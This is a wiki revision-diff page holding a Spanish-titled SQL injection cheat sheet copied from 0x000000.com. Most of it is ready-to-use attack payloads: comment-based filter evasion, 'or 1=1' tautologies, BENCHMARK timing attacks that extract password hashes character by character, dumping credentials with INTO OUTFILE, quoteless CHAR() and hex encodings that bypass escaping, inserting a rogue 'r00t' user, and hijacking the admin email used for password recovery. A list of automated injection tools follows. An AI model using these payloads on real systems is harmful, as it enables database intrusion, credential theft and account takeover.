meta data de esta página
  •  

Diferencias

Muestra las diferencias entre dos versiones de la página.

Enlace a la vista de comparación

Ambos lados, revisión anteriorRevisión previa
Próxima revisión		Revisión previa
seguridad:sql_injection [2013/03/18 09:43] lcseguridad:sql_injection [2023/01/18 14:11] (actual) – editor externo 127.0.0.1
Línea 1: Línea 1:
 ==== SQL Injection ==== ==== SQL Injection ====
 === Técnicas === === Técnicas ===
 +<file>
   * /**/   * /**/
   * /*--*/   * /*--*/
Línea 7: Línea 8:
   * %0A   * %0A
   * %0D   * %0D
 +</file>
  
-<note>Extraido de 0x000000.com</note> +=== Técnicas extraidas de 0x000000.com  === 
-<code>+<code sql>
 1 SELECT * FROM login /* foobar */ 1 SELECT * FROM login /* foobar */
 2 SELECT * FROM login WHERE id = 1 or 1=1 2 SELECT * FROM login WHERE id = 1 or 1=1
Línea 39: Línea 41:
 </code> </code>
 Variations: Variations:
-<code>+<code sql>
 01 SELECT * FROM login WHE/**/RE id = 1 o/**/r 1=1 01 SELECT * FROM login WHE/**/RE id = 1 o/**/r 1=1
 02 SELECT * FROM login WHE/**/RE id = 1 o/**/r 1=1 A/**/ND user L/**/IKE "%root%" 02 SELECT * FROM login WHE/**/RE id = 1 o/**/r 1=1 A/**/ND user L/**/IKE "%root%"
Línea 53: Línea 55:
 </code> </code>
 Blind injection vectors collection Blind injection vectors collection
-<code>+<code sql>
 Operators Operators
  
Línea 60: Línea 62:
 3 SELECT 1 XOR 0; 3 SELECT 1 XOR 0;
 </code> </code>
-<code>+<code sql>
 Evaluate Evaluate
 1 all render TRUE or 1. 1 all render TRUE or 1.
Línea 67: Línea 69:
 4 SELECT ISNULL(1/0); 4 SELECT ISNULL(1/0);
 </code> </code>
-<code>+<code sql>
 Math Math
 1 SELECT FLOOR(7 + (RAND() * 5)); 1 SELECT FLOOR(7 + (RAND() * 5));
 2 SELECT ROUND(23.298, -1); 2 SELECT ROUND(23.298, -1);
 </code> </code>
-<code>+<code sql>
 Misc Misc
 1 SELECT LENGTH(COMPRESS(REPEAT('a',1000))); 1 SELECT LENGTH(COMPRESS(REPEAT('a',1000)));
 2 SELECT MD5('abc'); 2 SELECT MD5('abc');
 </code> </code>
-<code>+<code sql>
 Benchmark Benchmark
 01 SELECT BENCHMARK(10000000,ENCODE('abc','123')); 01 SELECT BENCHMARK(10000000,ENCODE('abc','123'));
Línea 93: Línea 95:
 Beware of of the N rounds, add an extra zero and it could stall or crash your browser! Beware of of the N rounds, add an extra zero and it could stall or crash your browser!
 Gathering info Gathering info
-<code>+<code sql>
 Table mapping Table mapping
 1 SELECT COUNT(*) FROM tablename 1 SELECT COUNT(*) FROM tablename
 </code> </code>
-<code>+<code sql>
 Field mapping Field mapping
 1 SELECT * FROM tablename WHERE user LIKE "%root%" 1 SELECT * FROM tablename WHERE user LIKE "%root%"
Línea 104: Línea 106:
 4 SELECT * FROM tablename WHERE user = 'x' AND id IS NULL; 4 SELECT * FROM tablename WHERE user = 'x' AND id IS NULL;
 </code> </code>
-<code>+<code sql>
 User mapping User mapping
 1 SELECT * FROM tablename WHERE email = 'user@site.com'; 1 SELECT * FROM tablename WHERE email = 'user@site.com';
Línea 110: Línea 112:
 3 SELECT * FROM tablename WHERE user = 'username' 3 SELECT * FROM tablename WHERE user = 'username'
 </code> </code>
-<code>+<code sql>
 Advanced SQL vectors Advanced SQL vectors
 Writing info into files. Writing info into files.
 1 SELECT password FROM tablename WHERE username = 'root' INTO OUTFILE '/path/location/on/server/www/passes.txt' 1 SELECT password FROM tablename WHERE username = 'root' INTO OUTFILE '/path/location/on/server/www/passes.txt'
 </code> </code>
-<code>+<code sql>
 Writing info into files without single quotes: (example) Writing info into files without single quotes: (example)
 1 SELECT password FROM tablename WHERE username = CONCAT(CHAR(39),CHAR(97),CHAR(100),CHAR(109),CHAR(105),CHAR(110), 1 SELECT password FROM tablename WHERE username = CONCAT(CHAR(39),CHAR(97),CHAR(100),CHAR(109),CHAR(105),CHAR(110),
Línea 122: Línea 124:
 Note: You must specify a new file, it may not exists and give the correct pathname. Note: You must specify a new file, it may not exists and give the correct pathname.
 </code> </code>
-<code>+<code sql>
 The CHAR() quoteless function. The CHAR() quoteless function.
 1 SELECT * FROM login WHERE user = CONCAT(CHAR(39),CHAR(97),CHAR(100),CHAR(109),CHAR(105), 1 SELECT * FROM login WHERE user = CONCAT(CHAR(39),CHAR(97),CHAR(100),CHAR(109),CHAR(105),
Línea 129: Línea 131:
 4 SELECT * FROM login WHERE user = CHAR(39,97,39) 4 SELECT * FROM login WHERE user = CHAR(39,97,39)
 </code> </code>
-<code>+<code sql>
 Extracting hashes Extracting hashes
 1 SELECT user FROM login WHERE user = 'root' 1 SELECT user FROM login WHERE user = 'root'
Línea 139: Línea 141:
  
 The way to extract hashes is done this way if single quotes are allowed, see beneath it a quoteless example. The way to extract hashes is done this way if single quotes are allowed, see beneath it a quoteless example.
-<code>+<code sql>
 01 SELECT user FROM login WHERE user = 'admin' 01 SELECT user FROM login WHERE user = 'admin'
 02 UNION SELECT IF(SUBSTRING(pass,1,1) = CHAR(97), BENCHMARK(1000000,MD5('x')),null) FROM login1 02 UNION SELECT IF(SUBSTRING(pass,1,1) = CHAR(97), BENCHMARK(1000000,MD5('x')),null) FROM login1
Línea 153: Línea 155:
 </code> </code>
 A quoteless example: A quoteless example:
-<code>+<code sql>
 1 SELECT user FROM login WHERE user = CONCAT(CHAR(39),CHAR(97),CHAR(100),CHAR(109),CHAR(105),CHAR(110),CHAR( 39)) 1 SELECT user FROM login WHERE user = CONCAT(CHAR(39),CHAR(97),CHAR(100),CHAR(109),CHAR(105),CHAR(110),CHAR( 39))
 2 UNION SELECT IF(SUBSTRING(pass,1,2) = CHAR(97,97), BENCHMARK(1000000,MD5(CHAR(59))),null) FROM login 2 UNION SELECT IF(SUBSTRING(pass,1,2) = CHAR(97,97), BENCHMARK(1000000,MD5(CHAR(59))),null) FROM login
Línea 161: Línea 163:
 Misc. Misc.
 Insert a new user into DB Insert a new user into DB
-<code>+<code sql>
 1 INSERT INTO login SET user = 'r00t', pass = 'abc' 1 INSERT INTO login SET user = 'r00t', pass = 'abc'
 </code> </code>
Línea 170: Línea 172:
  
 Write the DB user away into tmp Write the DB user away into tmp
-<code>1 SELECT host,user,password FROM user into outfile '/tmp/passwd';</code>+<code sql>1 SELECT host,user,password FROM user into outfile '/tmp/passwd';</code>
  
 Change admin e-mail, for "forgot login retrieval." Change admin e-mail, for "forgot login retrieval."
Línea 180: Línea 182:
  
 Using an HEX encoded query to bypass escaping. Using an HEX encoded query to bypass escaping.
-<code>+<code sql>
 1 Normal: SELECT * FROM login WHERE user = 'root' 1 Normal: SELECT * FROM login WHERE user = 'root'
 2 Bypass: SELECT * FROM login WHERE user = 0x726F6F74 2 Bypass: SELECT * FROM login WHERE user = 0x726F6F74
Línea 190: Línea 192:
 </code> </code>
 How to determin the HEX value for injection. How to determin the HEX value for injection.
-<code>1 SELECT HEX('root'); gives you: 726F6F74. then add: 0x before it.</code>+<code sql>1 SELECT HEX('root'); gives you: 726F6F74. then add: 0x before it.</code>
  
 With comments. With comments.
Línea 203: Línea 205:
  
  
-=== Herramientas === +==== Herramientas ==== 
-Havij -> http://www.itsecteam.com/products/havij-v116-advanced-sql-injection/+  Havij -> http://www.itsecteam.com/products/havij-v116-advanced-sql-injection/ 
 +  * Havij http://www.taringa.net/comunidades/hackers/3552526/ 
 +  * PonyMagic http://poneymagic.diosdelared.com 
 +  * General Injection Explorer  
 +  * Safe 3 sql injector http://sourceforge.net/projects/safe3si/files/latest/download?source=directory 
 +  * Enema http://code.google.com/p/enema/ 
 +  * Absinthe http://sourceforge.net/projects/absinthe/ 
 +  * Pangolin http://nosec.org/en/productservice/pangolin/ 
 +  * sql poison 
 +  * sql map gui 
 +  * bsql hacker http://labs.portcullis.co.uk/application/bsql-hacker/ 
 +  * 
  
  
Línea 210: Línea 223:
 ==== Referencias ==== ==== Referencias ====
   * http://ha.ckers.org/sqlinjection/   * http://ha.ckers.org/sqlinjection/
 +  * http://www.antrax-labs.org/2012/01/sql-injection-desde-cero.html